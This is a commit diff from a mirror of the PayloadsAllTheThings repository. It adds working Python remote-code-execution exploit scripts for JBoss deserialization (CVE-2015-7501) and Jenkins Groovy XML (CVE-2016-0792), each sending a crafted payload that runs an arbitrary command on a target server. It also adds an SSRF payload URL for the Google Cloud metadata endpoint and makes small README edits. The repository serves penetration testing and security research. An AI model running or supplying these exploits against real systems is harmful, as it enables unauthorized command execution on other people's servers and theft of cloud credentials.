mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-05-21 07:06:07 +02:00
More CVE - RCE : Jenkins, JBoss, WebLogic, WebSphere
This commit is contained in:
parent
15fe34052b
commit
af9abc6592
|
@ -0,0 +1,61 @@
|
|||
#! /usr/bin/env python2
|
||||
|
||||
# Jboss Java Deserialization RCE (CVE-2015-7501)
|
||||
# Made with <3 by @byt3bl33d3r
|
||||
|
||||
import requests
|
||||
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
||||
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
||||
|
||||
import argparse
|
||||
import sys, os
|
||||
#from binascii import hexlify, unhexlify
|
||||
from subprocess import check_output
|
||||
|
||||
ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
|
||||
ysoserial_path = None
|
||||
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument('target', type=str, help='Target IP')
|
||||
parser.add_argument('command', type=str, help='Command to run on target')
|
||||
parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
|
||||
parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
|
||||
|
||||
if len(sys.argv) < 2:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
if not args.ysoserial_path:
|
||||
for path in ysoserial_default_paths:
|
||||
if os.path.exists(path):
|
||||
ysoserial_path = path
|
||||
else:
|
||||
if os.path.exists(args.ysoserial_path):
|
||||
ysoserial_path = args.ysoserial_path
|
||||
|
||||
if ysoserial_path is None:
|
||||
print '[-] Could not find ysoserial JAR file'
|
||||
sys.exit(1)
|
||||
|
||||
if len(args.target.split(":")) != 2:
|
||||
print '[-] Target must be in format IP:PORT'
|
||||
sys.exit(1)
|
||||
|
||||
if not args.command:
|
||||
print '[-] You must specify a command to run'
|
||||
sys.exit(1)
|
||||
|
||||
ip, port = args.target.split(':')
|
||||
|
||||
print '[*] Target IP: {}'.format(ip)
|
||||
print '[*] Target PORT: {}'.format(port)
|
||||
|
||||
gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
|
||||
|
||||
r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
|
||||
|
||||
if r.status_code == 200:
|
||||
print '[+] Command executed successfully'
|
||||
|
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,83 @@
|
|||
#! /usr/bin/env python2
|
||||
|
||||
#Jenkins Groovy XML RCE (CVE-2016-0792)
|
||||
#Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins
|
||||
#Made with <3 by @byt3bl33d3r
|
||||
|
||||
import requests
|
||||
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
||||
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
||||
|
||||
import argparse
|
||||
import sys
|
||||
|
||||
parser = argparse.ArgumentParser()
|
||||
parser.add_argument('target', type=str, help='Target IP:PORT')
|
||||
parser.add_argument('command', type=str, help='Command to run on target')
|
||||
parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
|
||||
|
||||
if len(sys.argv) < 2:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
if len(args.target.split(':')) != 2:
|
||||
print '[-] Target must be in format IP:PORT'
|
||||
sys.exit(1)
|
||||
|
||||
if not args.command:
|
||||
print '[-] You must specify a command to run'
|
||||
sys.exit(1)
|
||||
|
||||
ip, port = args.target.split(':')
|
||||
|
||||
print '[*] Target IP: {}'.format(ip)
|
||||
print '[*] Target PORT: {}'.format(port)
|
||||
|
||||
xml_formatted = ''
|
||||
command_list = args.command.split()
|
||||
for cmd in command_list:
|
||||
xml_formatted += '{:>16}<string>{}</string>\n'.format('', cmd)
|
||||
|
||||
xml_payload = '''<map>
|
||||
<entry>
|
||||
<groovy.util.Expando>
|
||||
<expandoProperties>
|
||||
<entry>
|
||||
<string>hashCode</string>
|
||||
<org.codehaus.groovy.runtime.MethodClosure>
|
||||
<delegate class="groovy.util.Expando" reference="../../../.."/>
|
||||
<owner class="java.lang.ProcessBuilder">
|
||||
<command>
|
||||
{}
|
||||
</command>
|
||||
<redirectErrorStream>false</redirectErrorStream>
|
||||
</owner>
|
||||
<resolveStrategy>0</resolveStrategy>
|
||||
<directive>0</directive>
|
||||
<parameterTypes/>
|
||||
<maximumNumberOfParameters>0</maximumNumberOfParameters>
|
||||
<method>start</method>
|
||||
</org.codehaus.groovy.runtime.MethodClosure>
|
||||
</entry>
|
||||
</expandoProperties>
|
||||
</groovy.util.Expando>
|
||||
<int>1</int>
|
||||
</entry>
|
||||
</map>'''.format(xml_formatted.strip())
|
||||
|
||||
print '[*] Generated XML payload:'
|
||||
print xml_payload
|
||||
print
|
||||
|
||||
print '[*] Sending payload'
|
||||
headers = {'Content-Type': 'text/xml'}
|
||||
r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload)
|
||||
|
||||
paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml']
|
||||
if r.status_code == 500:
|
||||
for path in paths_in_trace:
|
||||
if path in r.text:
|
||||
print '[+] Command executed successfully'
|
||||
break
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -350,6 +350,7 @@ Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
|
|||
|
||||
```powershell
|
||||
http://metadata.google.internal/computeMetadata/v1beta1/
|
||||
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
|
||||
```
|
||||
|
||||
### SSRF URL for Digital Ocean
|
||||
|
|
|
@ -9,7 +9,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
|
|||
- [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
|
||||
- [Polyglot XSS](#polyglot-xss)
|
||||
- [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
|
||||
- [CSP Bypas](#csp-bypass)
|
||||
- [CSP Bypass](#csp-bypass)
|
||||
- [Common WAF Bypas](#common-waf-bypass)
|
||||
|
||||
## Exploit code or POC
|
||||
|
@ -827,3 +827,4 @@ Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php
|
|||
- [XSSING WEB PART - 2 - Rakesh Mane](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html)
|
||||
- [Making an XSS triggered by CSP bypass on Twitter. @tbmnull](https://medium.com/@tbmnull/making-an-xss-triggered-by-csp-bypass-on-twitter-561f107be3e5)
|
||||
- [Ways to alert(document.domain) - @tomnomnom](https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309)
|
||||
- [D1T1 - Michele Spagnuolo and Lukas Wilschelbaum - So We Broke All CSPs](https://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Michele%20Spagnuolo%20and%20Lukas%20Wilschelbaum%20-%20So%20We%20Broke%20All%20CSPS.pdf)
|
||||
|
|
Loading…
Reference in New Issue